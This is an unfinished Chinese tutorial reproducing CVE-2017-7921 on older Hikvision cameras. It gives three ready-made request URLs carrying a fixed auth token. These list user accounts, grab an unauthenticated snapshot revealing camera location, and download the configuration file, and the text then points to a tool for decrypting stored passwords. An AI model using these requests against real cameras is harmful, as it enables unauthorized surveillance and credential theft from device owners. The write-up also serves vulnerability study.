前言

近期作者在进行测试时发现，部分网络环境存在大量老版本的海康威视摄像头，考虑到较早的的摄像头可能存在CVE-2017-7921漏洞，于是借此次机会对该漏洞进行复现研究。注意：本文内容仅供学习参考及处置建议，文章内容不涉及任何以破坏为目的的犯罪行为，敏感信息已经过脱敏处理，请勿将本文内容用于违法犯罪活动！

复现过程

第一步：发现摄像头

作者在此假设本文读者已经具备内网扫描的经验，可以自行发现环境中存活的设备，故不对扫描过程进行讲述
nmap使用教程请参照nmap详细使用教程_nmap使用教程_星落.的博客-CSDN博客
第二步：版本判断

目前已知的存在该漏洞的登录界面可能长以下的样子，具体情况可能要结合页面底部的版权信息页年份判断，已知2017年以前的摄像头基本存在该漏洞
图一图二为已知存在漏洞的登录页面样式（仅供参考）
图三为2021年登陆页面样式，不存该漏洞

第三步：构造URL发起测试

http://IP/Security/users?auth=YWRtaW46MTEK
获取所有用户
http://IP/onvif-http/snapshot?auth=YWRtaW46MTEK
拍摄快照而不进行身份验证
http://IP/System/configurationFile?auth=YWRtaW46MTEK
下载配置文件（该文件包含用户名密码等关键信息）

通过第一条URL构造我们可以获得该摄像头存在一个用户名为【admin】的管理员账户

通过第二条URL构造我们可以获取快照，可以知道该摄像头的实际位置

通过第三条URL构造，我们可以获取到摄像头的二进制配置文件
使用该URL将得到一个【configurationFile】文件，保存好这个文件进行下一步操作

第四步：解密配置文件获取用户名及密码

解密工具下载：chrisjd20/hikvision_CVE-2017-7921 (github.com)
本站快捷下载：点我下载

（文章未完待续...2023.6.13）